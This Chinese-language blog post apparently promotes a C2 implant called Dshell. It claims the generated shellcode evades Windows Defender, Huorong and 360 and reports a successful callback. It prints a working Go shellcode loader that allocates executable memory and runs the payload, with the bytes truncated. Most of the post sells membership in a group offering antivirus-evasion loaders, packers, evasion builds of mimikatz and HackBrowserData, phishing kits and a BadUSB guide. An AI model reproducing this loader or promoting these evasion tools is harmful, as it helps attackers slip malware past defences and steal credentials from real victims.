请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
shellcode生成
生成的bin文件只有2KB
windows defender
火绒
360
使用加载器加载shellcode文件上线
成功上线
使用go语言格式的加载器编写代码,编译运行上线
编写代码
package mainimport ("syscall""unsafe")funcmain() {kernel32 := syscall.NewLazyDLL("kernel32.dll")VirtualAlloc := kernel32.NewProc("VirtualAlloc")RtlMoveMemory := kernel32.NewProc("RtlMoveMemory")shellcode := []byte{0x56, 0x48...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))syscall.SyscallN(addr)}
编译运行 默认的shellcode就是免杀的, 成功上线
默认的shellcode就是免杀的, 成功上线
目前Dshell还属于内测阶段,仅限内测用户使用。
加入帮会,获取内测体验
👇 帮会早鸟价 👇
199元 / 年卡会员
299元 / 永久会员
后面工具越多,帮会价格越高
早加入早享受
加入后可获以下服务:
1. 帮会所有工具的永久使用权,工具包含:
(1)目前已有的所有工具:
Dshell内测工具
shellcode图形化转换工具
windows defender 免杀加载器
Rust免杀创建线程loader源码
Rust免杀编译环境虚拟机
360免杀版分离加载1.2
vshell免杀加载器
绕过360传输告警
CheckGoBuild(win&linux版本)
fscan2.0.0(各种免杀版本)
packerwdfV1.0.1
packer360V1.1.2
红队快速部署各种网页钓鱼工具(可内网)
go语言实现反射加载dll
packerhuorongV2.0.0
捆绑器源码学习
CS插件一键免杀v2.0--免杀360
CS插件一键免杀v1.0--免杀火绒6.0
badusb制作教程
去exe黑框工具
cslove-自研CS插件
360安全卫士开启晶核+qvm202+鲲鹏引擎专项
bypassQVM工具
360免杀马生成器
火绒免杀马生成器
defender免杀马生成器
mimikatz免杀版, 实战可过亚信
HackBrowserData免杀版
内网多级代理Venom毒液免杀版
内网多级代理Stowaway免杀版
CheckGoBuild.exe fuzz go编译参数工具
白加黑武器化工具GenDLLFile.exe
x步云沙箱环境信息获取工具
FileEntropyAnalyzer一款查看文件熵值的工具
大白哥版二开cs等
会持续一直更新免杀
**部分非免杀工具或后续陆续上传。
(2)后续的新工具(特别是图形化免杀工具),都会在帮会同步。
2. 后续所有工具的迭代更新版本将在帮会中发布;
3. 售后服务 + 持续更新 + 优先支持。
由于安卓支持小程序购买,苹果暂不支持
因此下面将区分两者的购买渠道
安卓用户小程序购买更方便
👇 点击图片跳转进入小程序 👇
👇 苹果/安卓用户都可扫码购买 👇
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...